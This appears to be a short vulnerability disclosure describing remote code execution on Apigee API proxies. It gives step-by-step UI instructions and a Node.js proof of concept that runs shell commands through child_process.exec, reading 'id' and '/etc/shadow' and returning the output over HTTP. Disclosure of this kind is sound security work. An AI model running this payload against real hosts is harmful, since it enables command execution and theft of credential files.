Apigee API proxies code exec

Summary: RCE on Apigee API proxies

Steps to reproduce:

1.- open apigee.com and log in with your account

2.- navigate to Develop > API proxies and click “+Proxy” button

3.- select hosted target:
– put any name (in this case “rce”)
– select the “Quick start” radio button and click the “Next” button, then “Next” again, and “Next” one more time
– check the “prod” checkbox and click the “Create and Deploy” button
– after the deploy, copy the url and click on “Edit proxy”

4.- select the “Develop” tab, then click the “index.js” file in the “Resources > hosted” section, replace the content of that file with the code below, and click “Save” and “Save” one more time:

var http = require('http');
const { exec } = require('child_process');

// Hosted target: the command runs on the hosted-target Node.js runtime and
// its stdout is returned in the HTTP response.
var svr = http.createServer(function(req, resp) {
  resp.setHeader('Content-Type', 'application/json');
  // you can put any linux command in the exec function
  exec('echo "- - - - id - - - -";id; echo ;echo "- cat /etc/shadow - ";cat /etc/shadow',
    (error, stdout, stderr) => {
      resp.end(stdout + '\npoc by @omespino');
    }
  );
});
svr.listen(process.env.PORT || 3000, function() {});